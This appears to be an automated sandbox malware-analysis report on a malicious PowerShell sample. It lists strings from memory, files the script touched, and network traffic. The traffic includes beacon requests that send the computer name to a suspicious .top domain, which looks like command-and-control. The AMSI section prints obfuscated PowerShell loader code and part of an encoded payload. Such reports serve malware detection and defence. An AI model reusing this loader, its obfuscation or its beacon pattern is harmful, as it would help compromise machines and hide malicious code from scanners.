Click to jump to signature section
Source: | Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB86000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2756104148.0000029A3FE5B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FB29000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb}a source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA8A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2753750135.0000029A3FA6E000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8 |
Source: global traffic | HTTP traffic detected: GET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8 |
Source: global traffic | HTTP traffic detected: GET /kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8X6ukQzO4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=FdSNZsJ7WO5j41urd6xg3Kkqe8OCGnQ0lkregDZIPnAPFY9IuPSGHKhcxcpV9WfSIzmZeIGW2P3n59N_pf4Pwyyrw2yzX1dTOgcdiSF0bvkufPLdDqeCy2GhbSkGCzVgpCt4huF_933eu1_eRw0KgItJsiOaJ0OyuDqKUotptyZfoLRQqfmtKJCmzVgBo-HG0ef8 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php? |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28A9C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527 |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.2753530709.0000029A3F8F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A286F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527p |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28C38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A2891C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD7szS81WzM1phgyDTHjwiRXyp_8udmMS11EIl0am6Md8 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgfyaGOWPpLsGIjBvOoy6lm-rPKjD |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A278D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A28909000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A27AAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.2748167521.0000029A37946000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.2723561959.0000029A2772F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.2724001546.0000029A288FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A2892F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2724001546.0000029A28929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ezsadh724cyuq98.(([system.String]::new(@((4698-4631),(94+(-4977+(9514-(6894-2374)))),(-7336+7448),(1064800/8800),(-2056+2140),(-3844+(6916-2961))))))( $szl8g71o0ri2mnu ) $ezsadh724cyuq98.((-join (@((-2730+2797),(-7577+(-1895+(40935340/(23091292/5404)))),(88578/(1165878/1461)),(1669-1554),(956-855))| ForEach-Object { [char]$_ })))()$380do6izmun74vj.((-join (@((460893/(13262712/1928)),(9783-(11209-1534)),(5335-5224),(-5309+5424),(3807-3706))| ForEach-Object { [char]$_ })))()[byte[]] $ioy3gwv4625ncs7 = $szl8g71o0ri2mnu.((-join (@((5469-5385),(3005-(29455132/10178)),(-638+703),(714210/(716+(1863+3686))),(8405-8291),(1573-(-5430+(14372-(17597362/(3924405/(-7152+(1830+(6323235/905)))))))),(1494-(-2271+(5349392/1468))))| ForEach-Object { [char]$_ })))() $cwbzftra792duoj=$ioy3gwv4625ncs7 return $cwbzftra792duoj}[System.Text.Encoding]::ascii.(([system.String]::new(@((6543-(59781864/9237)),(7327-(73546228/(19139-8961))),(3346-(11198410/3467)),(41583/501),(-659+775),(-4892+5006),(710745/6769),(8704-(20144336/(1310296/(2176187/(27757090/(3694+(-2918+(16545-(81843921/8031))))))))),(7608-(5450+(18480615/(19190-(11913-1716)))))))))((vyqsxj5am76zg41binc9trw230h "J+JmMmMzbXc1ZZnq4+dz5RK1wjRxioQXCJ/whvmOo3A4ITZOSccMMZJ2Q3MQRZ1nAXshKG12J8XvWOsp7RIWJEYIH1db408BlzfF2FxnOJCifquuxwewTZvXg+q2+gnMQBmJ7KDcAqgNGk0I15C79/D0mukN2w4JQZyX/8wsMknLi9bdJ4YQQZjL8pBmjktLxYr9dSysMupum8Gc9rydVQSE4xhsgOKHsxJh3D9NnJKmmkJK7lOFaKg/CugvNpvLv0S74ppamSd3vrrH/D+55KQLjsCUqYLgBMNQAymdGGyYjJMv+1Ok5hyWUaFSr0FY/1UIPN62gK9q+Rnh1VGsIDDaCo3WttfsQkUlKCrkhQafoiguakOysLxXg+pbtjM9dGJx/dbCnBFO3qLogCAP91a+pxX2aVHrTSXVSoS1hkbXtWym2NqFg8StumXL1c9p7gbwbl8NkZY+Cedh9xcWRBbNhaFuyhpZJraRwND8c+iOXYYzUyXTHVLA+Di+VLiqOuZ9R6TGVSypDtBpgzZjAYlESNqU0Fg99NSJF9Col4ylstcs48WCfo1CDEbs2w2Pv6KEPR5a3WT6fY2ev7cJa5m/13Wqv3OvSp1Tu9r3SOFTWkBI944kgxBRjj1fLHuP4uhxvNKVX4ynp4TFkhXlAa96UoJozmI3MLHdgL8qmK9aeJVaTZbP9XOk89XzAYJM75SxEZeGfD1LxWIN27HnKWieVUx+Ww2cW8MbvrnBG7utqfbQzLdXhY4LNEcqpuENIbKGjBk8/kXp4Vc/W9lvzgZ4DqjvrREvB2KyvMYWz9zViWvsDY8LhPvffG2Q18Ji6rsphZuq0NBE0+KbUVpv/0nZCQKQwpmTVJ4mB+bqW8Gc2CpHX/aySpXRj53v5te7k6KJ1QQMEAXS+koMFXZh2ZpE6uxuuk2O1JWJ8SwEggjGibPxr0bQz53yqAXKFQiw8KTnLGFaBEquSBAVU8TijBKdqfyzGBzKW/HLpKLhpfan8/K34N+euzsKZ0kgb126ipyF/WxEQrjeGc+P2Y6Zn6sw19kSao9fI3FVw9cvVN05exAbuV8VgM62cF4CPoJmzAUqaOwf/gSbRuIvwB2iG9aRyVc7vZ8WN1mpoBg9ln6v2Ft9fmUuewkvUragN2BC/He5JqmHihSmfz8bq1IBMiZSfMrmfPJwlKXhDM+uoQxG+onpi9tpk8cq+raO3IKGnb00uAEaSfznWackq71tliXhvqKj |